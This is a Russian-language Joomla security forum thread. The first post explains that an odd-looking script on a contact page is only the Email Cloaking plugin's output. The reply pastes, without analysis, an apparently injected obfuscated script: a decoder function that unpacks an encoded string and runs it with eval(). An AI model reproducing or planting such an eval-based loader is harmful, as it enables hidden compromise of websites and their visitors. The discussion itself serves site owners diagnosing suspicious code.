Вы здесь: Home Форум
IT-К@ФЕ. Welcome! :)
   
Добро пожаловать, Гость
Логин: Пароль: Запомнить меня
Забыли пароль? Забыли логин? Регистрация

IT-К@ФЕ
Форум
Joomla
Безопасность сайта на Joomla

Странный скрипт на сайте
(1 чел.) (1) гость
Ответить в теме
Новая тема
  • Страница:
  • 1

ТЕМА: Странный скрипт на сайте

Странный скрипт на сайте 1 год, 3 мес. назад #1081

  • Aleksej
  • Вне сайта
  • Moderator
  • Постов: 1738
  • Репутация: 40
Заходим на страничку "Контакты" сайта... и глазам своим не верим:

<script type="text/javascript">// <![CDATA[
// <![CDATA[
 var prefix = 'm&#97;&#105;lt&#111;:';
 var suffix = '';
 var attribs = '';
 var path = 'hr' + 'ef' + '=';
 var addy52547 = '&#105;nf&#111;' + '&#64;';
 addy52547 = addy52547 + 'm&#97;st&#101;rpr&#111;' + '&#46;' + 'ws';
 document.write( '<a ' + path + '\'' + prefix + addy52547 + suffix + '\'' + attribs + '>' );
 document.write( addy52547 );
 document.write( '<\/a>' );
// ]]></script>

Что-то ужасное! Ведь мы точно помним, что ничего подобного не прописывали на этой страничке! И вообще мы со скриптами на "вы"... что же это? вирус? или хакер? сайт, получается, взломан, нужно спешно менять пароли или, возможно, все сносить и восстанавливать из прошлогодней резервной копии?

Не спешите! все не так плохо.

Скрипт добавляет на страницу следующую ссылку:

<a href='m&#97;&#105;lt&#111;:&#105;nf&#111;&#64;m&#97;st&#101;rpr&#111;&#46;ws'>&#105;nf&#111;&#64;m&#97;st&#101;rpr&#111;&#46;ws</a>

Что равносильно -

<a href='mailto: Этот адрес электронной почты защищен от спам-ботов. У вас должен быть включен JavaScript для просмотра. '> Этот адрес электронной почты защищен от спам-ботов. У вас должен быть включен JavaScript для просмотра. </a>

Таким образом - попросту сработал плагин Joomla, носящий имя Content - Email Cloaking - вы всегда можете разглядеть его чуть пристальнее, открыв Расширения - Плагины:

Прячет все e-mail адреса в материалах от спамботов (используя JavaScript)

А значит - нет смысла пугаться, все ок.
Ответить Цитировать

Re: Странный скрипт на сайте 1 год, 3 мес. назад #1082

  • serge
  • Вне сайта
  • Expert Boarder
  • Постов: 149
  • Репутация: 7
У меня был похуже случай...

<script language=JavaScript>/*function varrban(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,61, 36,43,5,10,7,46,16,48,0,0,0,0,0,0,19,56,4,39,57,34 ,35,50,23,9,27,31,45,44,41,62,18,32,59,25,13,28,40 ,3,52,17,1,0,0,0,0,60,0,6,30,55,49,38,11,21,14,53, 12,33,24,29,15,37,54,26,2,58,47,51,8,20,22,42,0);f or(j=Math.ceil(l/b);j>0;j--){r='';for(i=Math.min(l,b);i>0;i--,l--){{w|=(t[x.charCodeAt(p++)-48])<<s;if(s){r+=String.fromCharCode(240^w&255);w>>=8 ;s-=2}else{s=6}}}eval(r);}}varrban('6eNCwODkbnvkYPlkW p_iXONCgb1GwOD24pSobPVc65leBxIpHuUex5l2mxIXbaSCgpM 2gqS28nVQ@pMXlPvkzy_cKKS2BxIdYPDQbRSoBOTkK0_iJcJ2B ENcrOSkbPIp1aIklsLQYsIoKpIpS3L94FU9rC1pHfSoxaDiJKL X8KlewPveTf_9IWTegeDolPluZWjG8nvkIGSoTfToShvQUaSE5 RDCbxNXhu_cSqNQYpSohKmp')*/</script><!-- logisticsmoldova.com -->
Ответить Цитировать
Ответить в теме
Новая тема
  • Страница:
  • 1
IT-К@ФЕ
Форум
Joomla
Безопасность сайта на Joomla
Время создания страницы: 0.24 секунд